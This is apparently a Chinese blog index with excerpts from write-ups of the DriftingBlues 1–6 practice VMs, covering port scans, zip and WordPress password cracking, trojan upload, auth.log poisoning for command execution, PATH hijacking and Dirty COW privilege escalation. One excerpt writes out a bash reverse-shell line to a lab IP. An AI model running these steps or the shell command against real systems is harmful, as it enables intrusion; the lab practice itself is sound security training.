driftingblues系列
文章平均质量分 82
魏钦6666
大仙安全说
展开
-
driftingblues6靶机(脏牛漏洞)
这段英文的意思是,警告“strftime():依赖系统的时区设置是不安全的。如果您使用了这些方法中的任何一种,并且仍然收到此警告,您很可能拼写错误了时区标识符。我们现在选择了时区“UTC”,但请设置date.timezone以选择您的时区。5.用unzip解压发现需要密码,那我们用fcrackzip,暴力破解。然后又改了密码,改完之后好像这个交互式界面又不能用了,也许命令在执行中。8.发现content下面的files能上传文件,上传我们的木马。6.正当我要上传dirty.c时,我的交互式界面不能用了。原创 2023-01-04 10:14:08 · 625 阅读 · 0 评论 -
driftingblues4靶机(zbarimg二维码破解)
cat id_rsa.pub > /home/weiqin/桌面/authorized_keys //cat向已有文件追加内容。直接登录,查看到一个满权限文件夹hubert,可以给他创一个.ssh文件夹,里面添加本地公钥,那不就可以登录ssh了么!3.这边直接把uname命令替换掉,让它执行我写的提权命令,把环境变量改变成优先执行我的uname就行。2.nmap -p- -A -T4 192.168.1.107 扫描靶机开放端口和相应服务。4.执行getinfo命令,直接进入root.成功拿下!原创 2022-12-28 10:00:23 · 629 阅读 · 0 评论 -
driftingblues3靶机(auth.log日志、命令执行)
1.回弹shell成功后用python来弹交互式shell,在robertj用户下发现.ssh目录。那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行。8.把ip给替换成可以执行提权的命令,然后把环境变量改了,就可以成功提权。2.看下敏感目录里的信息,不让访问/eventadmins目录。等几分钟再执行curl命令,发现成功记录了登陆的信息。1.故意登录ssh,造成报错,看能否在日志里看到。7.查看之后,发现特别像auth.log的内容。9.最后进入root目录,成功拿下!原创 2022-12-19 19:52:59 · 701 阅读 · 0 评论 -
driftingblues2靶机(nmap提权)
2.用python3回弹交互式shell后,在freddie用户下,发现.ssh文件。2.访问blog目录,发现老熟人wordpress,和之前一样网页加载不完全。随便点个目录,改成错误的,让它触发404页面,反弹shell。6.用wpscan探测他的用户名,发现一个albert用户名。3.访问.ssh文件后把私钥下载到本地,用来登录ssh。5.写入后,刷新页面,熟悉的页面就回来了。3.用curl命令看源码,发现他的域名。虚拟机网络链接模式:桥接模式。7.爆破一下,成功拿到密码。6.最后也是成功拿下!原创 2022-12-15 15:15:42 · 417 阅读 · 0 评论 -
driftingblues靶机(0ok编码)
2.一顿命令探测没有可利用的,我直接上传了一个linpeas.sh(github里有)脚本,给他可执行权限就可以运行。2.echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' -n | base64 -d //解码。bash -i >& /dev/tcp/192.168.1.105/4444 0>&1 //反弹shell。/bin/bash' > emergency //要执行bash命令。5.把域名添加到/etc/hosts 下 再用source刷新。4.再次查看源码,发现一个用户名。原创 2022-12-12 21:52:16 · 621 阅读 · 0 评论